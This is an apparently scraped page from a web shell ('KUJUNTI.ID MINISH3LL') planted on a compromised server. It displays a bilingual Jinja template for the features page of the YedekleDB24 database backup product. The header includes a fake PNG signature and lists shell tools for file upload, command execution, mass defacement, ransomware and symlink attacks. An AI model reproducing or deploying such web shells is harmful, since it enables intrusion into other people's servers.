\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/yedekle24/BackupShield/templates/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/yedekle24/BackupShield/templates/features.html


{% extends 'base.html' %}

{% block title %}
    {% if current_language == 'tr' %}
        Özellikler - YedekleDB24
    {% else %}
        Features - YedekleDB24
    {% endif %}
{% endblock %}

{% block content %}
    <!-- Features Hero Section -->
    <section class="hero-section bg-light py-5">
        <div class="container py-5">
            <div class="row align-items-center">
                <div class="col-lg-8 mx-auto text-center">
                    <h1 class="display-4 fw-bold mb-4">
                        {% if current_language == 'tr' %}
                            YedekleDB24 Özellikleri
                        {% else %}
                            YedekleDB24 Features
                        {% endif %}
                    </h1>
                    <p class="lead text-secondary mb-0">
                        {% if current_language == 'tr' %}
                            PostgreSQL, MySQL ve MariaDB için veritabanı yedekleme ve kurtarma çözümü
                        {% else %}
                            Database backup and recovery solution for PostgreSQL, MySQL, and MariaDB
                        {% endif %}
                    </p>
                </div>
            </div>
        </div>
    </section>

    <!-- Main Features Section -->
    <section class="py-5">
        <div class="container py-4">
            <div class="row g-5">
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-primary p-3 mb-3">
                            <i class="fas fa-database text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Veritabanı Bağlantıları
                            {% else %}
                                Database Connections
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Şu anda desteklenen veritabanlarına bağlanın: MySQL, PostgreSQL ve MariaDB. (SQL Server, Oracle ve MongoDB desteği yakında eklenecektir.)
                            {% else %}
                                Connect to currently supported databases: MySQL, PostgreSQL, and MariaDB. (SQL Server, Oracle, and MongoDB support coming soon.)
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-success p-3 mb-3">
                            <i class="fas fa-clock text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Zamanlanmış Yedeklemeler
                            {% else %}
                                Scheduled Backups
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Otomatik yedekleme işlerini yapılandırın ve zamanlayın. Günlük, haftalık veya özel aralıklarla çalıştırın.
                            {% else %}
                                Configure and schedule automated backup jobs. Run them daily, weekly, or at custom intervals.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-info p-3 mb-3">
                            <i class="fas fa-hdd text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Depolama Hedefleri
                            {% else %}
                                Storage Targets
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Yedeklerinizi yerel depolama, ağ paylaşımları, FTP sunucuları ve bulut depolama hizmetlerinde saklayın.
                            {% else %}
                                Store your backups on local storage, network shares, FTP servers, and cloud storage services.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-warning p-3 mb-3">
                            <i class="fas fa-compress-arrows-alt text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Sıkıştırma ve Şifreleme
                            {% else %}
                                Compression and Encryption
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Depolama alanından tasarruf edin ve güvenliği artırın. Yedeklerinizi otomatik olarak sıkıştırın ve şifreleyin.
                            {% else %}
                                Save storage space and enhance security. Automatically compress and encrypt your backups.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-danger p-3 mb-3">
                            <i class="fas fa-history text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Kolay Geri Yükleme
                            {% else %}
                                Easy Restore
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Yedeklerden hızlı ve güvenilir şekilde geri yükleme yapın. Veri kaybı durumunda iş sürekliliğini sağlayın.
                            {% else %}
                                Restore from backups quickly and reliably. Ensure business continuity in case of data loss.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-primary p-3 mb-3">
                            <i class="fas fa-bell text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                E-posta Bildirimleri
                            {% else %}
                                Email Notifications
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Başarılı veya başarısız yedekleme işlerinde e-posta bildirimleri alın. Her zaman güncel kalın.
                            {% else %}
                                Receive email notifications for successful or failed backup jobs. Stay updated at all times.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-success p-3 mb-3">
                            <i class="fas fa-chart-line text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Detaylı Raporlama
                            {% else %}
                                Detailed Reporting
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Yedekleme geçmişi, boyut ve durum hakkında kapsamlı raporlar alın. Performansı ölçün ve optimize edin.
                            {% else %}
                                Get comprehensive reports on backup history, size, and status. Measure and optimize performance.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-info p-3 mb-3">
                            <i class="fas fa-eye text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Durum İzleme
                            {% else %}
                                Status Monitoring
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Gerçek zamanlı durum paneli ile yedekleme işlerini izleyin. Sorunları hızlıca tespit edin ve çözün.
                            {% else %}
                                Monitor backup jobs with a real-time dashboard. Quickly identify and resolve issues.
                            {% endif %}
                        </p>
                    </div>
                </div>
                <div class="col-md-6 col-lg-4">
                    <div class="feature-card h-100 p-4 bg-light rounded-4">
                        <div class="feature-icon-container d-inline-flex align-items-center justify-content-center rounded-circle bg-warning p-3 mb-3">
                            <i class="fas fa-users text-white fa-2x"></i>
                        </div>
                        <h3 class="h4 fw-bold">
                            {% if current_language == 'tr' %}
                                Çoklu Kullanıcı
                            {% else %}
                                Multi-User
                            {% endif %}
                        </h3>
                        <p class="text-secondary">
                            {% if current_language == 'tr' %}
                                Farklı rol ve izinlerle çoklu kullanıcı desteği. Ekip çalışması için idealdir.
                            {% else %}
                                Multi-user support with different roles and permissions. Ideal for team collaboration.
                            {% endif %}
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Advanced Features Section -->
    <section class="bg-light py-5">
        <div class="container py-4">
            <div class="row align-items-center">
                <div class="col-lg-6 mb-5 mb-lg-0">
                    <h2 class="fw-bold mb-4">
                        {% if current_language == 'tr' %}
                            Gelişmiş Özellikler
                        {% else %}
                            Advanced Features
                        {% endif %}
                    </h2>
                    <ul class="feature-list">
                        <li class="mb-3">
                            <div class="d-flex">
                                <i class="fas fa-check-circle text-primary me-3 mt-1"></i>
                                <span>
                                    {% if current_language == 'tr' %}
                                        <strong>Otomatik Rotasyon:</strong> Yedekleme dosyalarının otomatik rotasyonu ile disk alanından tasarruf edin.
                                    {% else %}
                                        <strong>Automatic Rotation:</strong> Save disk space with automatic rotation of backup files.
                                    {% endif %}
                                </span>
                            </div>
                        </li>
                        <li class="mb-3">
                            <div class="d-flex">
                                <i class="fas fa-check-circle text-primary me-3 mt-1"></i>
                                <span>
                                    {% if current_language == 'tr' %}
                                        <strong>Uzak Erişim:</strong> Herhangi bir yerden web arayüzü üzerinden yedekleme işlemlerini yönetin.
                                    {% else %}
                                        <strong>Remote Access:</strong> Manage backup operations via web interface from anywhere.
                                    {% endif %}
                                </span>
                            </div>
                        </li>
                        <li class="mb-3">
                            <div class="d-flex">
                                <i class="fas fa-check-circle text-primary me-3 mt-1"></i>
                                <span>
                                    {% if current_language == 'tr' %}
                                        <strong>Çoklu Dil Desteği:</strong> Türkçe ve İngilizce arayüz ile küresel kullanım.
                                    {% else %}
                                        <strong>Multi-Language Support:</strong> Global usage with Turkish and English interfaces.
                                    {% endif %}
                                </span>
                            </div>
                        </li>
                        <li class="mb-3">
                            <div class="d-flex">
                                <i class="fas fa-check-circle text-primary me-3 mt-1"></i>
                                <span>
                                    {% if current_language == 'tr' %}
                                        <strong>Doğrulama Testleri:</strong> Otomatik yedek doğrulama testleri ile veri bütünlüğünü sağlayın.
                                    {% else %}
                                        <strong>Verification Tests:</strong> Ensure data integrity with automatic backup verification tests.
                                    {% endif %}
                                </span>
                            </div>
                        </li>
                        <li>
                            <div class="d-flex">
                                <i class="fas fa-check-circle text-primary me-3 mt-1"></i>
                                <span>
                                    {% if current_language == 'tr' %}
                                        <strong>API Entegrasyonu:</strong> Mevcut sistemlerinize entegrasyon için kapsamlı API.
                                    {% else %}
                                        <strong>API Integration:</strong> Comprehensive API for integration with your existing systems.
                                    {% endif %}
                                </span>
                            </div>
                        </li>
                    </ul>
                </div>
                <div class="col-lg-6">
                    <div class="advanced-features-image p-4 bg-white rounded shadow-sm">
                        <img src="{{ url_for('static', filename='images/dashboard_updated.png') }}" alt="YedekleDB24 Dashboard" class="img-fluid rounded">
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- System Requirements Section -->
    <section class="py-5">
        <div class="container py-4">
            <div class="row justify-content-center">
                <div class="col-lg-10">
                    <div class="text-center mb-5">
                        <h2 class="fw-bold">
                            {% if current_language == 'tr' %}
                                Sistem Gereksinimleri
                            {% else %}
                                System Requirements
                            {% endif %}
                        </h2>
                        <p class="lead text-secondary">
                            {% if current_language == 'tr' %}
                                YedekleDB24'ü çalıştırmak için minimum gereksinimler
                            {% else %}
                                Minimum requirements to run YedekleDB24
                            {% endif %}
                        </p>
                    </div>
                    <div class="row g-4">
                        <div class="col-md-6">
                            <div class="h-100 p-4 bg-light rounded-4">
                                <h4 class="fw-bold mb-3">
                                    {% if current_language == 'tr' %}
                                        Donanım Gereksinimleri
                                    {% else %}
                                        Hardware Requirements
                                    {% endif %}
                                </h4>
                                <ul class="mb-0">
                                    <li class="mb-2">
                                        {% if current_language == 'tr' %}
                                            <strong>CPU:</strong> Dual-core işlemci (2.0 GHz veya üzeri)
                                        {% else %}
                                            <strong>CPU:</strong> Dual-core processor (2.0 GHz or higher)
                                        {% endif %}
                                    </li>
                                    <li class="mb-2">
                                        {% if current_language == 'tr' %}
                                            <strong>RAM:</strong> Minimum 4 GB (8 GB önerilir)
                                        {% else %}
                                            <strong>RAM:</strong> Minimum 4 GB (8 GB recommended)
                                        {% endif %}
                                    </li>
                                    <li class="mb-2">
                                        {% if current_language == 'tr' %}
                                            <strong>Disk:</strong> 100 GB (yedekleme verilerine bağlı olarak)
                                        {% else %}
                                            <strong>Disk:</strong> 100 GB (depending on backup data)
                                        {% endif %}
                                    </li>
                                    <li>
                                        {% if current_language == 'tr' %}
                                            <strong>Ağ:</strong> Gigabit Ethernet
                                        {% else %}
                                            <strong>Network:</strong> Gigabit Ethernet
                                        {% endif %}
                                    </li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="h-100 p-4 bg-light rounded-4">
                                <h4 class="fw-bold mb-3">
                                    {% if current_language == 'tr' %}
                                        Yazılım Gereksinimleri
                                    {% else %}
                                        Software Requirements
                                    {% endif %}
                                </h4>
                                <ul class="mb-0">
                                    <li class="mb-2">
                                        {% if current_language == 'tr' %}
                                            <strong>İşletim Sistemi:</strong> Windows Server 2016/2019/2022, Linux (Ubuntu 18.04+, CentOS 7+)
                                        {% else %}
                                            <strong>Operating System:</strong> Windows Server 2016/2019/2022, Linux (Ubuntu 18.04+, CentOS 7+)
                                        {% endif %}
                                    </li>
                                    <li class="mb-2">
                                        {% if current_language == 'tr' %}
                                            <strong>Web Tarayıcısı:</strong> Chrome, Firefox, Edge (güncel sürümler)
                                        {% else %}
                                            <strong>Web Browser:</strong> Chrome, Firefox, Edge (latest versions)
                                        {% endif %}
                                    </li>
                                    <li>
                                        {% if current_language == 'tr' %}
                                            <strong>Veritabanı İstemcileri:</strong> MySQL, PostgreSQL, SQL Server için ilgili istemciler
                                        {% else %}
                                            <strong>Database Clients:</strong> Respective clients for MySQL, PostgreSQL, SQL Server
                                        {% endif %}
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- CTA Section -->
    <section class="bg-light py-5">
        <div class="container py-5">
            <div class="row justify-content-center">
                <div class="col-lg-10">
                    <div class="bg-primary text-white p-5 rounded-4">
                        <div class="row align-items-center">
                            <div class="col-lg-8 mb-4 mb-lg-0">
                                <h2 class="fw-bold mb-3">
                                    {% if current_language == 'tr' %}
                                        Hemen Başlayın
                                    {% else %}
                                        Get Started Now
                                    {% endif %}
                                </h2>
                                <p class="lead mb-0">
                                    {% if current_language == 'tr' %}
                                        30 günlük ücretsiz deneme ile YedekleDB24'ün tüm özelliklerini keşfedin.
                                    {% else %}
                                        Discover all features of YedekleDB24 with a 30-day free trial.
                                    {% endif %}
                                </p>
                            </div>
                            <div class="col-lg-4 text-lg-end">
                                <a href="https://demo.yedekledb24.tr/" class="btn btn-light btn-lg" target="_blank">
                                    {% if current_language == 'tr' %}
                                        Ücretsiz Deneme
                                    {% else %}
                                        Free Trial
                                    {% endif %}
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
{% endblock %}

© KUJUNTI.ID